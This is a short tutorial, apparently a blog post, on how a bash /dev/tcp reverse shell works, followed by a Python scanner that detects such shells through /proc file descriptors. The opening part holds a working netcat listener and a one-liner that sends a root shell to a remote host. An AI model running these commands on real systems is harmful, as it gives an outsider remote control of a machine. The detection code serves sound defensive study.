A reverse shell is achieved when you "send" a server's shell (in my demo the server is named target) to another server (hq in my setup). Using this technique you can run root commands on a server you aren't connected to.
# open up a tcp port on the "hq" server to "receive" the reverse shell
$ nc -n -l -p 60001
# send the shell from the "target" server to the socket hq is listening on
# (10.20.30.40 is hq's address; the /dev/tcp redirection is a bash feature, so this needs bash)
$ nohup /bin/bash >& /dev/tcp/10.20.30.40/60001 0<&1 2>&1 &
# now on "hq" you can run any command
hostname # command typed on hq, sent for execution on the remote host
target # output received back from the command
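From the defender's side, the interesting thing about the command above is what it leaves behind on target. The redirections are applied by the parent shell before bash is started, so `ps` only shows a plain `/bin/bash`; what does survive is that file descriptors 0, 1 and 2 of that bash point at a TCP socket instead of a tty or pipe, which is visible under /proc/PID/fd. The following is an added example, not code from the original post: it walks a /proc-style tree and flags shells whose stdin and stdout are the same socket. The /proc layout (`comm`, `fd/` symlinks of the form `socket:[inode]`) is real Linux behaviour; the process table used by `demo()` is constructed for illustration, and the shell name list is an assumption you would tune per environment.

```python
"""Flag shells whose standard streams are a socket (the /dev/tcp reverse-shell footprint).

Added example, not part of the original post. On a live Linux host call
scan_proc("/proc") as root; demo() runs the same logic over a constructed
/proc lookalike so the example works offline.
"""
import os
import re
import tempfile
from dataclasses import dataclass
from typing import Dict, List, Tuple

# Assumption: the interpreters worth flagging in this environment.
SHELLS = {"bash", "sh", "dash", "zsh", "ksh"}
# /proc/PID/fd/N is a symlink whose target reads "socket:[<inode>]" for sockets.
SOCKET_RE = re.compile(r"^socket:\[(\d+)\]$")


@dataclass(frozen=True)
class Finding:
    pid: int
    comm: str
    socket_inode: str  # inode shared by the socket-backed std fds


def is_reverse_shell_candidate(comm: str, fd_links: Dict[int, str]) -> bool:
    """A shell reading stdin from and writing stdout to the same socket.

    This is exactly what `bash >& /dev/tcp/... 0<&1` produces: fds 0 and 1 (and 2)
    all refer to one TCP socket. A normal interactive shell has /dev/pts/N here.
    """
    if comm not in SHELLS:
        return False
    s0 = SOCKET_RE.match(fd_links.get(0, ""))
    s1 = SOCKET_RE.match(fd_links.get(1, ""))
    return bool(s0 and s1 and s0.group(1) == s1.group(1))


def read_fd_links(pid_dir: str) -> Dict[int, str]:
    """Resolve every numeric entry of <pid_dir>/fd to its symlink target."""
    links: Dict[int, str] = {}
    fd_dir = os.path.join(pid_dir, "fd")
    try:
        for name in os.listdir(fd_dir):
            if name.isdigit():
                try:
                    links[int(name)] = os.readlink(os.path.join(fd_dir, name))
                except OSError:
                    pass  # fd closed between listdir and readlink
    except OSError:
        pass  # process exited, or not root (fd/ of other users' processes is restricted)
    return links


def scan_proc(proc_root: str = "/proc") -> List[Finding]:
    """Walk a /proc-style tree and return shells wired to a socket."""
    findings: List[Finding] = []
    for entry in sorted(os.listdir(proc_root), key=lambda e: int(e) if e.isdigit() else -1):
        if not entry.isdigit():
            continue
        pid_dir = os.path.join(proc_root, entry)
        try:
            with open(os.path.join(pid_dir, "comm")) as f:
                comm = f.read().strip()
        except OSError:
            continue  # raced with process exit
        links = read_fd_links(pid_dir)
        if is_reverse_shell_candidate(comm, links):
            findings.append(Finding(int(entry), comm, SOCKET_RE.match(links[0]).group(1)))
    return findings


def build_fake_proc(root: str) -> None:
    """Constructed /proc lookalike: a socket-backed bash, a bash on a pty, and sshd."""
    procs = {
        "1433": ("bash", {0: "socket:[48213]", 1: "socket:[48213]", 2: "socket:[48213]"}),
        "2001": ("bash", {0: "/dev/pts/0", 1: "/dev/pts/0", 2: "/dev/pts/0"}),
        "2002": ("sshd", {0: "/dev/null", 1: "/dev/null", 2: "/dev/null", 3: "socket:[51000]"}),
    }
    for pid, (comm, fds) in procs.items():
        fd_dir = os.path.join(root, pid, "fd")
        os.makedirs(fd_dir)
        with open(os.path.join(root, pid, "comm"), "w") as f:
            f.write(comm + "\n")
        for fd, target in fds.items():
            os.symlink(target, os.path.join(fd_dir, str(fd)))  # dangling link is fine here


def demo() -> List[Tuple[int, str, str]]:
    """Scan the constructed tree; returns [(pid, comm, socket_inode), ...]."""
    with tempfile.TemporaryDirectory() as root:
        build_fake_proc(root)
        return [(f.pid, f.comm, f.socket_inode) for f in scan_proc(root)]


if __name__ == "__main__":
    for pid, comm, inode in demo():
        print(f"pid={pid} comm={comm} stdin/stdout on socket inode {inode}")
```

Two caveats when running this for real: fd/ of processes owned by other users is only readable as root, and services that hand a connected socket to a child shell on purpose (inetd-style daemons) will also match, so pair the hit with the parent process and the socket's peer address from `ss -tnp` before treating it as a reverse shell.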